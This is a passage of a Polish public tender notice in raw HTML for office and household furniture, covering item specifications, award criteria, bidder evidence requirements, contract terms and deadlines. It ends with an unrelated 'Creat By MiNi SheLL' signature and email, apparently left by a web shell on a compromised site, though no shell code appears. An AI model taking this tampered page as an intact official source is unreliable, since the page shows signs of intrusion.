2x, 100cm<br/>66.	Szafa	1	350x236x64	biały	dąb bejcowany na biało	12x, 100x58<br/>4x, 50x58	5	2x, 100cm<br/>1x, 50cm<br/>67.	komoda	1	40x55	biały	okleina dębowa bejcowana na biało	0	2	0<br/>68.	Szafa (2 drzwi)	2	79x176x55	biały	płyta meblowa <br/>69.	Szafka kuchenna stojąca	14	80x62x75	biały/ szary rama	płyta wiórowa	1	0	0<br/>70.	Szafka łazienkowa (1 drzwi)	1	60x17x75	biały	płyta meblowa	2	0	0<br/>71.	Szafka łazienkowa (2 drzwi)	2	80x17x75	biały	płyta meblowa	2	0	0<br/>72.	Szafka na buty	41	52x18x39 biały	plastik	0	0	0<br/>73.	Szafka na buty	11	80x35x102	biały	płyta meblowa	4	0	0<br/>74.	Szafka na buty (2 przegrody)	1	49x28x93	biały	płyta meblowa	0	2	0<br/>75.	Szafka na buty (3 przegrody)	6	49x28x135	biały	płyta meblowa	0	3	0<br/>76.	Szafka nocna	59	35x49x40	biały	płyta meblowa	0	2	0<br/>77.	Szafka nocna	24	35x40x49	czarny brąz	płyta meblowa	0	2	0<br/>78.	Szafka stojąca kuchenna szuflady	3	60x62x75	biały/ szary płyta meblowa	0	3	0<br/>79.	Szafka stojąca kuchenna szuflady	1	40x62x75	biały/ szary płyta meblowa	0	3	0<br/>80.	Szafka wisząca	2	60x60 cm	białe połysk	płyta meblowa	1	0	0<br/>81.	Szafka wisząca	3	60x32x75	biały/ szary płyta meblowa	2	0	0<br/>82.	Szafka wisząca	5	80x32x75	biały/ szary płyta meblowa	2	0	0<br/>83.	Szafka wysoka z półkami	1	40x60x220	biały	płyta meblowa	7	0	0<br/><br/><br/><br/><br/><br/>Zamawiający dopuszcza możliwość składania ofert równoważnych. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 273933,43 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39141300-5 - Szafy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39141100-3 - Regały</p> <p class="mb-0">39121000-6 - Biurka i stoły</p> <p class="mb-0">39112000-0 - Krzesła</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena (C) – waga kryterium 60%; ( w zł)<br/>Okres gwarancji (G) - waga kryterium 40%; ( w miesiącach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, Wykonawca dołącza do oferty stosowne oświadczenie, aktualne na dzień składania ofert.<br/>3.	Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>4.	Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>5.	Podmiotowe środki dowodowe od Wykonawcy obejmują:<br/>5.1	Oświadczenie Wykonawcy o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów ( Dz.U. z 2020 r. poz. 1076) , z innym Wykonawca , który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postepowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postepowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ. <br/>6.	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>1)	może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp dane umożliwiające dostęp do tych środków;<br/>2)	podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ust. 1.<br/>7.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>8.	W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 2 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (dotyczy również wspólników spółki cywilnej) oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Załącznik nr 1 - formularz ofertowy<br/>Załącznik nr 5 - formularz cenowy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Każdy z Wykonawców oddzielnie musi udokumentować, że nie podlega wykluczeniu w zakresie wymaganym przez Zamawiającego tj. oświadczenie stanowiące załącznik nr 2 do SWZ<br/>2. Każdy z Wykonawców zobowiązany jest do złożenia listy podmiotów należących do tej samej grupy kapitałowej, albo informację o tym, że nie należy do grupy kapitałowej – wg wzoru stanowiącego załącznik nr 3 do SIWZ.<br/>3. Co najmniej jeden z Wykonawców lub kilku z nich łącznie muszą spełniać warunki działu w postępowaniu, w zakresie opisanym przez Zamawiającego; <br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie; <br/>5. Wykonawcy występujący wspólnie zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego; <br/>6.Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem <br/> występującym jako reprezentant pozostałych. <br/><br/><br/>X. Poleganie na zasobach innych podmiotów<br/><br/>1.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>2.	W odniesieniu do warunków dotyczących doświadczenia, Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają świadczenie do realizacji którego te zdolności są wymagane.<br/>3.	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów . <br/>4.	Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy.<br/>5.	Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu .<br/>6.	Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby .<br/>7.	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w Rozdziale VIII ust. 1 SWZ, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby, zgodnie z katalogiem dokumentów określonych w Rozdziale VIII SWZ . <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 6 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 6 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-09 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza &#34; dostępnego na Platformie e-Zamówienia, który jest przetwarzany przez Platformę i przesyłana do Oferenta. Wykonawca ma możliwość pobrania wersji roboczej formularza. 2.2 Ofertę należy sporządzić w języku polskim, w postaci elektronicznej dostępnej na Platformie e-Zamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-09 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com